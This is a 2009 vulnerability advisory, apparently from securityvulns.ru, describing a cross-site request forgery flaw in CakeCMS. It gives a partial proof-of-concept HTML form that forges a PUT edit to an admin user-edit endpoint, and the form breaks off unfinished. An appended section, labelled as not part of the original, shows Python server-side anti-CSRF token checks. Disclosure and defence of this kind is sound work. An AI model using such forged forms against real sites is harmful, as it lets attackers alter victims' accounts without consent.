Computer Security
[EN] securityvulns.ru

From:onur.turkeshan_(at)_hotmail.com <onur.turkeshan_(at)_hotmail.com>
Date:16.06.2009
Subject:CakeCMS XSRF Vulnerability

< ------------------- header data start ------------------- >

#########################################################

# Application Name : CakeCMS

# Vulnerable Type : Edit USER (XSRF) Vuln

# author : MnmL ~ Bug Researchers


#############################################################

< ------------------- header data end of ------------------- >


< -- bug code start -- >
<form action="SITE.COM/admin/users/edit/41" method="post" id="UserEditForm">
<fieldset style="display: none;"><input type="hidden" value="PUT" name="_method"/></fieldset>
<input type="hidden" id="UserId" value="41" name="data[User][id]"/>
User Name : <input type="text" name="data[User][name]" size="86" maxlength="50" value="dsada" id="UserName"/>
E-Mail : <input type="text" name="data[User][email]" size="86" maxlength="100" value="dsada@dsada.com" id="UserEmail"/>
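
Added example, not part of the original advisory and not CakeCMS code: the form above carries no per-session secret, so the server has nothing to distinguish it from its own edit form. The Python sketch below shows the server-side check that closes this gap, using an HMAC token bound to the session id; SERVER_KEY, TOKEN_FIELD, the session ids and all function names are assumptions made for the example.

```python
import hashlib
import hmac
import secrets

# Constructed server-side secret for this example; a real deployment loads it from config.
SERVER_KEY = secrets.token_bytes(32)
UNSAFE_METHODS = {"POST", "PUT", "PATCH", "DELETE"}
TOKEN_FIELD = "data[_Token][key]"  # hypothetical field name, not taken from CakeCMS


def issue_token(session_id: str) -> str:
    """Return the token the server embeds as a hidden field in its own edit form."""
    nonce = secrets.token_hex(16)
    mac = hmac.new(SERVER_KEY, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return f"{nonce}.{mac}"


def token_is_valid(session_id: str, token: str) -> bool:
    """Recompute the MAC for this session and compare in constant time."""
    nonce, sep, mac = token.partition(".")
    if not sep:
        return False
    expected = hmac.new(SERVER_KEY, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(mac.encode(), expected.encode())


def effective_method(http_method: str, form: dict) -> str:
    """Apply the hidden _method override (the form above sends _method=PUT over POST)."""
    return form.get("_method", http_method).upper()


def allow_request(http_method: str, form: dict, session_id: str) -> bool:
    """Reject any state-changing request that lacks a token bound to the caller's session."""
    # Check the transport method and the override, so neither one can bypass the check.
    methods = {http_method.upper(), effective_method(http_method, form)}
    if not (methods & UNSAFE_METHODS):
        return True
    return token_is_valid(session_id, form.get(TOKEN_FIELD, ""))


# Constructed request body: the fields the form in the advisory submits, with no token.
CROSS_SITE_SUBMIT = {
    "_method": "PUT",
    "data[User][id]": "41",
    "data[User][name]": "dsada",
    "data[User][email]": "dsada@dsada.com",
}
```

A request is accepted only when the token field was issued for the same session that sends it, so a form hosted on another site is refused even though the browser attaches the session cookie.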
